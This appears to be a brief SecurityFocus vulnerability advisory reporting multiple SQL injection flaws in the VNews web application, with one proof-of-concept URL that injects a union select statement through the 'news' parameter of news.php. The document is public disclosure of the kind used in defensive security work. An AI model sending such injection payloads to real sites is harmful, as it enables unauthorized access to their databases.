VNews Multiple SQL Injection Vulnerabilities

These issues can be exploited through a web client.

The following proof-of-concept URI is available:

http://www.example.com/vnews/news.php? co=show&news=99'% 20union%20select% 201,2,3,4,5, 6/*&nom=1


 

Privacy Statement
Copyright 2010, SecurityFocus